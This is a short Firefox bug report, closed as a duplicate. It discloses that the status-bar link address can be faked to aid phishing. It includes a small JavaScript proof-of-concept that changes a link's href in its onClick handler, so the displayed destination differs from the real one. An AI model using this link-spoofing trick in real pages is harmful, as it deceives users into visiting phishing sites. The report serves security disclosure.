Closed Bug 405324 Opened 17 years ago Closed 17 years ago

Address of webpage in status bar could be faked, to make phishing attack more reliable

Categories

(Toolkit :: Safe Browsing, defect)

Product:
Toolkit
Component:
Safe Browsing
Platform:
x86
Linux
Type:
defect
Priority:
Not set
Severity:
normal

Tracking

()

Status:
RESOLVED DUPLICATE of bug 229050

People

(Reporter: yamashici, Unassigned)

References

(
URL
)

Details

User-Agent:       Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.3) Gecko/20070208 Mandriva/2.0.0.3-2mdv2007.1 (2007.1) Firefox/2.0.0.3
Build Identifier: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.3) Gecko/20070208 Mandriva/2.0.0.3-2mdv2007.1 (2007.1) Firefox/2.0.0.3

tested on WinXP with newest Firefox + Mandriva linux with Firefox 2.0.0.3

Reproducible: Always

Steps to Reproduce:
1.
2.
3.



source code - http://miki.udl.pl/tsu/upload/fakelink.html

<script>
function findLinkByHref(href) {
for (var i=0; i<document.links.length; i++) {if (document.links[i].href == href) return i;}return -1;
}

function changeLinkHref(id,newHref,oldHref) {
if (document.links.length > 0) { if (document.getElementById) {document.getElementById(id).href = newHref;} else if (document.all) {document.all[id].href = newHref;} else {var index = findLinkByHref(oldHref);if (index > -1) document.links[index].href = newHref;}}
}

function phish() {
changeLinkHref('fakelink', 'http://google.pl', 'phishing.html');
}

</script>

<a id='fakelink' href='phishing.html' onClick='javascript:phish();'>phish !</a>
Group: security
Status: UNCONFIRMED → RESOLVED
Closed: 17 years ago
Resolution: --- → DUPLICATE
Product: Firefox → Toolkit
You need to log in before you can comment on or make changes to this bug.